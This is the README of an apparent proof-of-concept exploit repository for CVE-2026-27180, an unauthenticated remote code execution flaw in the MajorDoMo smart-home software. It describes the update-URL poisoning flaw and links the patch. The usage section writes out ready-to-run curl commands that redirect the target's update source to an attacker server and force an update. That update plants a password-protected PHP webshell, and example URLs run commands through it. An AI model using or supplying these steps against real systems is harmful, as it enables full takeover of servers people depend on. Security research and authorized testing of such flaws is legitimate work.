## https://sploitus.com/exploit?id=B24AC294-563F-55ED-83EB-41102877E7E0
# MajorDoMo RCE

[](https://www.python.org/)
[](https://opensource.org/licenses/MIT)
[](https://www.vulncheck.com/advisories/majordomo-supply-chain-remote-code-execution-via-update-url-poisoning)
[](https://www.exploit-db.com/)
**Unauthenticated Remote Code Execution via Update URL Poisoning in MajorDoMo**
**CWE-494** β Download of Code Without Integrity Check
**Impact**: Full server compromise via webshell placed in web root
**Authentication Required**: None
**Patch**: [PR #1177](https://github.com/sergejey/majordomo/pull/1177)
## π Description
This repository contains a proof-of-concept exploit for **CVE-2026-27180** β a critical unauthenticated remote code execution vulnerability in **MajorDoMo** smart home automation software.
An attacker can:
- Poison the update source URL without authentication
- Force an update that downloads and extracts a malicious tarball
- Place arbitrary PHP files (including webshells) directly into the web root
The vulnerability exists because:
- No authentication check on `auto_update_settings` and `force_update` modes
- No TLS certificate validation (`CURLOPT_SSL_VERIFYPEER = false`)
- No signature / integrity check on downloaded update packages
- Extracted files are copied recursively into the document root
## π οΈ Features
- All-in-one Python script (no external files needed)
- Malicious Atom feed + tarball generated in memory
- Password-protected multi-method webshell (`poc.php`)
- Optional `.htaccess` to force PHP execution
- Clean console output with copy-paste commands
## π Installation
```bash
git clone https://github.com/YOUR-USERNAME/majordomo-cve-2026-27180-exploit.git
cd majordomo-cve-2026-27180-exploit
# No pip install needed β uses only standard library + argparse
```
## π PoC Attack Flow
```mermaid
graph TD
A[Attacker starts malicious HTTP serverserving /master.xml + /archive/master.tar.gz] --> B[Attacker poisons update URLvia GET /objects/?module=saverestore&mode=auto_update_settings&set_update_url=http://attacker:8080]
B --> C[Attacker triggers updateGET /objects/?module=saverestore&mode=force_update]
C --> D[MajorDoMo fetches poisoned Atom feed]
D --> E[Downloads malicious master.tar.gz(CURLOPT_SSL_VERIFYPEER=false)]
E --> F[Extracts tar.gz with tar xzvf ...]
F --> G[copyTree() copies files recursivelyβ poc.php & .htaccess land in web root]
G --> H[Attacker accesses webshellhttp://target/poc.php?pass=ChangeMe123&cmd=id]
style A fill:#f9d5e5,stroke:#333
style H fill:#c3e6cb,stroke:#333
```
## π₯οΈ Usage
```bash
python3 exploit.py http://192.168.1.50:80 --lhost 192.168.1.100 --lport 8080
```
**After the server starts**, run these commands against the **target**:
```bash
# 1. Poison the update source
curl 'http://192.168.1.50:80/objects/?module=saverestore&mode=auto_update_settings&set_update_url=http://192.168.1.100:8080'
# 2. Trigger the forced update
curl 'http://192.168.1.50:80/objects/?module=saverestore&mode=force_update'
```
Wait 10β90 seconds, then test:
```bash
# Examples:
http://192.168.1.50/poc.php?pass=ChangeMe123&cmd=id
http://192.168.1.50/poc.php?pass=ChangeMe123&cmd=whoami
http://192.168.1.50/poc.php?pass=ChangeMe123&cmd=uname%20-a
```
## β οΈ Legal & Ethical Notice
**This code is provided for educational purposes, authorized security testing, and red teaming only.**
- Do NOT use this exploit against systems you do not own or have explicit written permission to test.
- Unauthorized use may violate laws including the Computer Fraud and Abuse Act (CFAA) and equivalents worldwide.
- The author is not responsible for any misuse or damage caused by this code.
## π License
MIT License
Copyright (c) 2026 Mohammed Idrees Banyamer